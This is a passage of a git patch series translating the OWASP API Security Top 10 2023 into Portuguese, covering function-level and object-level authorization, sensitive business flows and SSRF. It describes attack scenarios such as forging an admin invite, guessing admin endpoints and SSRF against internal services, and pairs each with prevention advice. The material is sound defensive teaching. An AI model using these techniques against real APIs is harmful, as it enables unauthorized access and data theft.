É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | ## A API é vulnerável? From 893192c9781838a30f3225b8c1cf5b9f057a707d Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 10:42:56 +0100 Subject: [PATCH 38/64] Update 0xa5-broken-function-level-authorization.md --- ...xa5-broken-function-level-authorization.md | 59 +++++++++++-------- 1 file changed, 34 insertions(+), 25 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 9c2d47673..234e010a1 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md 
@@ -32,17 +32,17 @@ ordinários e.g. `api/users`. ### Cenário #1 -During the registration process for an application that allows only invited -users to join, the mobile application triggers an API call to -`GET /api/invites/{invite_guid}`. The response contains a JSON with details -about the invite, including the user's role and the user's email. +Durante o processo de registo para uma aplicação que permite apenas a adesão +de utilizadores convidados, a aplicação móvel faz uma chamada de API para +`GET /api/invites/{invite_guid}`. A resposta contém um JSON com detalhes sobre +o convite, incluindo o perfil do utilizador e o email do utilizador. -An attacker duplicates the request and manipulates the HTTP method and endpoint -to `POST /api/invites/new`. This endpoint should only be accessed by -administrators using the admin console. The endpoint does not implement -function level authorization checks. +Um atacante duplica o pedido e manipula o método HTTP e o _endpoint_ para +`POST /api/invites/new`. Este _endpoint_ deveria ser usado apenas por +administradores através da consola de administração. O _endpoint_ não implementa +verificações de autorização de acesso à função. -The attacker exploits the issue and sends a new invite with admin privileges: +O atacante explora a falha e envia um novo convite com privilégios de administrador: ``` POST /api/invites/new @@ -53,8 +53,8 @@ POST /api/invites/new } ``` -Later on, the attacker uses the maliciously crafted invite in order to create -themselves an admin account and gain full access to the system. +Mais tarde, o atacante usa o convite criado maliciosamente para criar uma conta +de administrador e obter acesso total ao sistema. ### Cenário #2 
@@ -65,22 +65,31 @@ checks. An attacker who learned the API structure takes an educated guess and manages to access this endpoint, which exposes sensitive details of the users of the application. +Uma API contém um _endpoint_ que deveria ser exposto apenas a administradores - +`GET /api/admin/v1/users/all`. Este _endpoint_ retorna os detalhes de todos os +utilizadores da aplicação e não implementa verificações de autorização de acesso +à função. Um atacante que aprendeu sobre a estrutura da API faz uma suposição +informada e consegue aceder a este _endpoint_, expondo detalhes sensíveis dos +utilizadores da aplicação. + ## Como Prevenir -Your application should have a consistent and easy-to-analyze authorization -module that is invoked from all your business functions. Frequently, such -protection is provided by one or more components external to the application -code. - -* The enforcement mechanism(s) should deny all access by default, requiring - explicit grants to specific roles for access to every function. -* Review your API endpoints against function level authorization flaws, while - keeping in mind the business logic of the application and groups hierarchy. -* Make sure that all of your administrative controllers inherit from an - administrative abstract controller that implements authorization checks - based on the user's group/role. -* Make sure that administrative functions inside a regular controller implement - authorization checks based on the user's group and role. +A sua API deve usar um módulo de autorização consistente e fácil de analisar, o +qual deve ser invocado por todas as funções de negócio. Frequentemente, este +tipo de proteção é oferecido por um ou mais componentes externos à lógica +aplicacional. + +* Por omissão todos os acesso devem ser negados, exigindo que permissões + específicas sejam concedidas a perfis específicos para acesso a cada função. 
+* Rever todos os _endpoints_ à procura de falhas ao nível da verificação de + autorização de acesso a funções, tendo sempre em consideração a lógica de + negócio da aplicação e hierarquia dos grupos. +* Assegurar que todos os controladores administrativos herdam de um controlador + administrativo base que implementa as verificações de autorização com base no + grupo/perfil do utilizador. +* Assegurar que funções administrativas num controlador ordinário implementam + elas próprias as verificações de autorização baseadas no grupo e perfil do + utilizador. ## Referências From d05941f7715f13dfa599df86ff90cad67d66a8a6 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 10:47:04 +0100 Subject: [PATCH 39/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...icted-access-to-sensitive-business-flows.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index 46956d1f4..dfbac78b0 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md 
@@ -1,11 +1,11 @@ # API6:2023 Unrestricted Access to Sensitive Business Flows -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | | Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. | -## Is the API Vulnerable? +## A API é vulnerável? When creating an API Endpoint, it is important to understand which business flow it exposes. Some business flows are more sensitive than others, in the sense @@ -27,9 +27,9 @@ spam by one social network, but encouraged by another social network. An API Endpoint is vulnerable if it exposes a sensitive business flow, without appropriately restricting the access to it. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A technology company announces they are going to release a new gaming console on Thanksgiving. The product has a very high demand and the stock is limited. An 
@@ -44,7 +44,7 @@ users. Later on, the attacker sells the product on another platform for a much higher price. -### Scenario #2 +### Cenário #2 An airline company offers online ticket purchasing with no cancellation fee. A user with malicious intentions books 90% of the seats of a desired flight. @@ -56,7 +56,7 @@ the flight. At this point, the user buys herself a single ticket that is much cheaper than the original one. -### Scenario #3 +### Cenário #3 A ride-sharing app provides a referral program - users can invite their friends and gain credit for each friend who has joined the app. This credit can be later @@ -68,7 +68,7 @@ process, with each new user adding credit to the attacker's wallet. The attacker can later enjoy free rides or sell the accounts with excessive credits for cash. -## How To Prevent +## Como Prevenir The mitigation planning should be done in two layers: @@ -95,7 +95,7 @@ The mitigation planning should be done in two layers: as developer and B2B APIs). They tend to be an easy target for attackers because they often don't implement all the required protection mechanisms. -## References +## Referências ### OWASP From e9fce924ceb721d328266a616a5c82385ed58b86 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 11:04:06 +0100 Subject: [PATCH 40/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...cted-access-to-sensitive-business-flows.md | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index dfbac78b0..a96c4ec12 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md 
@@ -3,29 +3,29 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | -| Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. | +| A exploração geralmente envolve entender o modelo de negócio suportado pela API, encontrar fluxos de negócio sensíveis e automatizar o acesso a esses fluxos, causando danos ao negócio. | A falta de uma visão holística da API para suportar plenamente os requisitos de negócio tende a contribuir para a prevalência deste problema. Os atacantes identificam manualmente quais recursos (e.g. _endpoints_) estão envolvidos no fluxo de trabalho alvo e como funcionam em conjunto. Se já existirem mecanismos de mitigação, os atacantes precisam encontrar uma maneira de os contornar. | Em geral, não se espera um impacto técnico significativo. A exploração pode prejudicar o negócio de diferentes maneiras, por exemplo: impedir que utilizadores legítimos comprem um produto ou levar a uma inflação na economia interna de um jogo. | ## A API é vulnerável? -When creating an API Endpoint, it is important to understand which business flow -it exposes. 
Some business flows are more sensitive than others, in the sense -that excessive access to them may harm the business. +Ao criar um _endpoint_ de API, é importante entender qual fluxo de negócio ele +expõe. Alguns fluxos de negócio são mais sensíveis do que outros, no sentido de +que o acesso excessivo a eles pode prejudicar o negócio. -Common examples of sensitive business flows and risk of excessive access -associated with them: +Exemplos comuns de fluxos de negócios sensíveis e o risco de acesso excessivo +associado a eles: -* Purchasing a product flow - an attacker can buy all the stock of a high-demand - item at once and resell for a higher price (scalping) -* Creating a comment/post flow - an attacker can spam the system -* Making a reservation - an attacker can reserve all the available time slots - and prevent other users from using the system +* Fluxo de compra de um produto - um atacante pode comprar todo o stock de um + item de alta procura de uma só vez e revendê-lo por um preço mais alto (scalping). +* Fluxo de criação de comentário/publicação - um atacante pode inundar o sistema com spam. +* Realização de uma reserva - um atacante pode reservar todos os horários disponíveis + e impedir que outros utilizadores utilizem o sistema. -The risk of excessive access might change between industries and businesses. -For example - creation of posts by a script might be considered as a risk of -spam by one social network, but encouraged by another social network. +O risco de acesso excessivo pode variar entre indústrias e empresas. Por exemplo, a +criação de publicações através de um script pode ser considerada um risco de spam por +uma rede social, mas incentivada por outra rede social. -An API Endpoint is vulnerable if it exposes a sensitive business flow, without -appropriately restricting the access to it. +Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem restringir +adequadamente o acesso a ele. ## Exemplos de Cenários de Ataque 
From db5b5a252aa8c65488968ee6954e7fb772f212fd Mon Sep 17 00:00:00 2001
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Mon, 27 May 2024 17:43:20 +0100
Subject: [PATCH 41/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md
---
...cted-access-to-sensitive-business-flows.md | 99 ++++++++++---------
1 file changed, 51 insertions(+), 48 deletions(-)
diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
index a96c4ec12..ef321c8bb 100644
--- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
+++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md
@@ -31,69 +31,72 @@ adequadamente o acesso a ele. ### Cenário #1 -A technology company announces they are going to release a new gaming console on -Thanksgiving. The product has a very high demand and the stock is limited. An -attacker writes code to automatically buy the new product and complete the -transaction. +Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no Dia +de Ação de Graças. O produto tem uma procura muito alta e o stock é limitado. Um +atacante escreve código para comprar automaticamente o novo produto e concluir a +transação. -On the release day, the attacker runs the code distributed across different IP -addresses and locations. The API doesn't implement the appropriate protection -and allows the attacker to buy the majority of the stock before other legitimate -users. +No dia do lançamento, o atacante executa o código distribuído por diferentes +endereços IP e localizações. A API não implementa a proteção adequada e permite +que o atacante compre a maior parte do stock antes de outros utilizadores +legítimos. -Later on, the attacker sells the product on another platform for a much higher -price. +Mais tarde, o atacante vende o produto noutra plataforma por um preço muito mais +alto. ### Cenário #2 -An airline company offers online ticket purchasing with no cancellation fee. A -user with malicious intentions books 90% of the seats of a desired flight. +Uma companhia aérea oferece a compra de bilhetes online sem taxa de cancelamento. +Um utilizador com intenções maliciosas reserva 90% dos assentos de um voo desejado. -A few days before the flight the malicious user canceled all the tickets at -once, which forced the airline to discount the ticket prices in order to fill -the flight. +Alguns dias antes do voo, o utilizador malicioso cancelou todos os bilhetes de uma +vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para preencher +o voo. 
-At this point, the user buys herself a single ticket that is much cheaper than -the original one. +Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato do +que o original. ### Cenário #3 -A ride-sharing app provides a referral program - users can invite their friends -and gain credit for each friend who has joined the app. This credit can be later -used as cash to book rides. +Uma aplicação de partilha de boleias oferece um programa de referência - os +utilizadores podem convidar os seus amigos e ganhar crédito por cada amigo que +se juntar à aplicação. Este crédito pode ser posteriormente utilizado como +dinheiro para reservar viagens. -An attacker exploits this flow by writing a script to automate the registration -process, with each new user adding credit to the attacker's wallet. +Um atacante explora este fluxo escrevendo um script para automatizar o processo +de registo, com cada novo utilizador a adicionar crédito à carteira do atacante. -The attacker can later enjoy free rides or sell the accounts with excessive -credits for cash. +O atacante pode posteriormente usufruir de viagens gratuitas ou vender as contas +com créditos excessivos por dinheiro. ## Como Prevenir -The mitigation planning should be done in two layers: - -* Business - identify the business flows that might harm the business if they - are excessively used. -* Engineering - choose the right protection mechanisms to mitigate the business - risk. - - Some of the protection mechanisms are more simple while others are more - difficult to implement. The following methods are used to slow down automated - threats: - - * Device fingerprinting: denying service to unexpected client devices (e.g - headless browsers) tends to make threat actors use more sophisticated - solutions, thus more costly for them - * Human detection: using either captcha or more advanced biometric solutions - (e.g. 
typing patterns) - * Non-human patterns: analyze the user flow to detect non-human patterns (e.g. - the user accessed the "add to cart" and "complete purchase" functions in - less than one second) - * Consider blocking IP addresses of Tor exit nodes and well-known proxies - - Secure and limit access to APIs that are consumed directly by machines (such - as developer and B2B APIs). They tend to be an easy target for attackers - because they often don't implement all the required protection mechanisms. +O planeamento da mitigação deve ser feito em duas camadas: + +* Negócio - identificar os fluxos de negócio que podem prejudicar a empresa se + forem utilizados em excesso. +* Engenharia - escolher os mecanismos de proteção adequados para mitigar o risco + empresarial. + + Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais + difíceis de implementar. Os seguintes métodos são utilizados para desacelerar + ameaças automatizadas: + + * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente + inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes + usem soluções mais sofisticadas, tornando-as mais caras para eles. + * Detecção humana: utilize _captcha_ ou soluções biométricas mais avançadas + (e.g. padrões de digitação). + * Padrões não humanos: analisar o fluxo do utilizador para detectar padrões + não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e + "finalizar compra" em menos de um segundo). + * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem + conhecidos. + + Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas + (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para + atacantes, pois muitas vezes não implementam todos os mecanismos de proteção + necessários. ## Referências From c8e34d46296395dddb308d8cc99c70c295b38e8e Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Mon, 3 Jun 2024 10:37:09 +0100
Subject: [PATCH 42/64] Update 0xa7-server-side-request-forgery.md
---
editions/2023/pt-pt/0xa7-server-side-request-forgery.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md
index 70bce4868..72e4e5fd7 100644
--- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md
+++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md
@@ -1,9 +1,9 @@ # API7:2023 Server Side Request Forgery -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | -| Exploitation requires the attacker to find an API endpoint that accesses a URI that’s provided by the client. In general, basic SSRF (when the response is returned to the attacker), is easier to exploit than Blind SSRF in which the attacker has no feedback on whether or not the attack was successful. | Modern concepts in application development encourage developers to access URIs provided by the client. Lack of or improper validation of such URIs are common issues. Regular API requests and response analysis will be required to detect the issue. When the response is not returned (Blind SSRF) detecting the vulnerability requires more effort and creativity. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. 
Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | ## Is the API Vulnerable? From 132e1685e71ac19d29b200ac6779090f5320477e Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 3 Jun 2024 12:53:52 +0100 Subject: [PATCH 43/64] Update 0xa7-server-side-request-forgery.md --- .../pt-pt/0xa7-server-side-request-forgery.md | 56 ++++++++++--------- 1 file changed, 29 insertions(+), 27 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index 72e4e5fd7..7e36e4a0e 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md 
@@ -3,39 +3,41 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | -| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. 
| A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | -## Is the API Vulnerable? +## A API é vulnerável? -Server-Side Request Forgery (SSRF) flaws occur when an API is fetching a remote -resource without validating the user-supplied URL. It enables an attacker to -coerce the application to send a crafted request to an unexpected destination, -even when protected by a firewall or a VPN. +Falhas de Server-Side Request Forgery (SSRF) ocorrem quando uma API pede um +recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que +um atacante force a aplicação a enviar um pedido manipulado para um destino +inesperado, mesmo quando protegido por uma firewall ou uma VPN. -Modern concepts in application development make SSRF more common and more -dangerous. +Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais +comum e mais perigoso. -More common - the following concepts encourage developers to access an external -resource based on user input: Webhooks, file fetching from URLs, custom SSO, -and URL previews. +Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder +a recursos externos com base em entradas de utilizadores: Webhooks, download +de ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. -More dangerous - Modern technologies like cloud providers, Kubernetes, and -Docker expose management and control channels over HTTP on predictable, -well-known paths. Those channels are an easy target for an SSRF attack. +Mais perigoso - Tecnologias modernas como provedores de nuvem, Kubernetes e +Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis +e bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. 
-It is also more challenging to limit outbound traffic from your application, -because of the connected nature of modern applications. +Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido +à natureza conectada das aplicações modernas. -The SSRF risk can not always be completely eliminated. While choosing a -protection mechanism, it is important to consider the business risks and needs. +O risco de SSRF nem sempre pode ser completamente eliminado. Ao escolher um +mecanismo de proteção, é importante considerar os riscos e necessidades do +negócio. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 -A social network allows users to upload profile pictures. The user can choose -either to upload the image file from their machine, or provide the URL of the -image. Choosing the second, will trigger the following API call: +Uma rede social permite que os utilizadores façam o upload de fotos de perfil. +O utilizador pode escolher entre carregar o ficheiro de imagem do seu +dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar +a seguinte chamada API: ``` POST /api/profile/upload_picture @@ -57,7 +59,7 @@ internal network using the API Endpoint. Based on the response time, the attacker can figure out whether the port is open or not. -### Scenario #2 +### Cenário #2 A security product generates events when it detects anomalies in the network. Some teams prefer to review the events in a broader, more generic monitoring @@ -127,7 +129,7 @@ POST /graphql Since the application shows the response from the test request, the attacker can view the credentials of the cloud environment. -## How To Prevent +## Como Prevenir * Isolate the resource fetching mechanism in your network: usually these features are aimed to retrieve remote resources and not internal ones. 
@@ -142,14 +144,14 @@ can view the credentials of the cloud environment. * Validate and sanitize all client-supplied input data. * Do not send raw responses to clients. -## References +## Referências ### OWASP * [Server Side Request Forgery][1] * [Server-Side Request Forgery Prevention Cheat Sheet][2] -### External +### Externas * [CWE-918: Server-Side Request Forgery (SSRF)][3] * [URL confusion vulnerabilities in the wild: Exploring parser inconsistencies, From 29fe0f7dfd0a71938dc8146f07d21b2b945e0f63 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 11 Jul 2024 14:26:22 +0100 Subject: [PATCH 44/64] Align text to 80 --- editions/2023/pt-pt/0x00-notice.md | 3 +- editions/2023/pt-pt/0x04-release-notes.md | 23 +++++---- .../0xa1-broken-object-level-authorization.md | 48 ++++++++--------- .../2023/pt-pt/0xa2-broken-authentication.md | 28 +++++----- ...ken-object-property-level-authorization.md | 51 +++++++++---------- .../0xa4-unrestricted-resource-consumption.md | 51 +++++++++---------- ...xa5-broken-function-level-authorization.md | 10 +--- ...cted-access-to-sensitive-business-flows.md | 47 +++++++++-------- .../pt-pt/0xa7-server-side-request-forgery.md | 28 +++++----- 9 files changed, 141 insertions(+), 148 deletions(-) diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md index 275675afc..70f915752 100644 --- a/editions/2023/pt-pt/0x00-notice.md +++ b/editions/2023/pt-pt/0x00-notice.md @@ -1,6 +1,7 @@ # Nota -Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para quaisquer versões oficiais deste documento como por exemplo o website. +Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para +quaisquer versões oficiais deste documento como por exemplo o website. Contribuições para o projeto tais como comentários, correções ou traduções devem ser feitas aqui. Para mais detalhes sobre [Como Contribuir][1], por favor 
diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md
index a2d8274bb..3f3f32672 100644
--- a/editions/2023/pt-pt/0x04-release-notes.md
+++ b/editions/2023/pt-pt/0x04-release-notes.md
@@ -18,24 +18,25 @@ detalhes sobre os riscos de segurança, consulte a [secção Riscos de Seguranç em APIs][3]. O OWASP API Security Top 10 2023 é um documento de sensibilização prospetivo -para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta edição: +para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta +edição: * Combinámos *Excessive Data Exposure* e *Mass Assignment*, focando na causa comum: falhas na validação de autorização ao nível das propriedades do objeto. -* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na rapidez - com que são esgotados. +* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na + rapidez com que são esgotados. * Criámos uma nova categoria "*Unrestricted Access to Sensitive Business Flows*" - para abordar novas ameaças, incluindo a maioria daquelas que podem ser mitigadas - através de *rate limiting*. + para abordar novas ameaças, incluindo a maioria daquelas que podem ser + mitigadas através de *rate limiting*. * Adicionámos "*Unsafe Consumption of APIs*" para abordar algo que começámos a - observar: os atacantes começaram a procurar serviços integrados de um alvo para - os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este é o - momento certo para começar a sensibilizar sobre este risco crescente. + observar: os atacantes começaram a procurar serviços integrados de um alvo + para os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este + é o momento certo para começar a sensibilizar sobre este risco crescente. As APIs desempenham um papel cada vez mais importante na arquitetura moderna de -microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet das -Coisas (IoT), etc. O OWASP API Security Top 10 é um esforço necessário para criar -sensibilização sobre os problemas de segurança modernos das APIs. +microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet +das Coisas (IoT), etc. 
O OWASP API Security Top 10 é um esforço necessário para +criar sensibilização sobre os problemas de segurança modernos das APIs. Esta atualização só foi possível devido ao grande esforço de vários voluntários, listados na secção de [Agradecimentos][4]. diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 4ef1fe3a8..2d12ea930 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md 
@@ -8,27 +8,27 @@ ## A API é vulnerável? A autorização de acesso ao nível do objeto é um mecanismo de controlo que -geralmente é implementado ao nível do código para validar que um utilizador -só pode aceder aos objetos aos quais deveria ter permissão para aceder. +geralmente é implementado ao nível do código para validar que um utilizador só +pode aceder aos objetos aos quais deveria ter permissão para aceder. -Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação -sobre o objeto deve implementar verificações de autorização ao nível do -objeto. As verificações devem validar que o utilizador autenticado tem -permissões para realizar a ação solicitada sobre o objeto alvo. +Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação sobre +o objeto deve implementar verificações de autorização ao nível do objeto. As +verificações devem validar que o utilizador autenticado tem permissões para +realizar a ação solicitada sobre o objeto alvo. As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de informações, modificação ou destruição de todos os dados. -Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do -token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente -para resolver a falha de Broken Object Level Authorization (BOLA). Esta -abordagem pode endereçar apenas um pequeno subconjunto de casos. +Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do token JWT) com +o parâmetro de ID vulnerável não é uma solução suficiente para resolver a falha +de Broken Object Level Authorization (BOLA). Esta abordagem pode endereçar +apenas um pequeno subconjunto de casos. -No caso de BOLA, é por design que o utilizador tem acesso ao -*endpoint*/função da API vulnerável. A violação ocorre ao nível do objeto, -através da manipulação do ID. 
Se um atacante conseguir aceder a um -*endpoint*/função da API ao qual não deveria ter acesso - este é um caso de -[Broken Function Level Authorization][5] (BFLA) em vez de BOLA. +No caso de BOLA, é por design que o utilizador tem acesso ao *endpoint*/função +da API vulnerável. A violação ocorre ao nível do objeto, através da manipulação +do ID. Se um atacante conseguir aceder a um *endpoint*/função da API ao qual não +deveria ter acesso - este é um caso de [Broken Function Level Authorization][5] +(BFLA) em vez de BOLA. ## Exemplos de Cenários de Ataque 
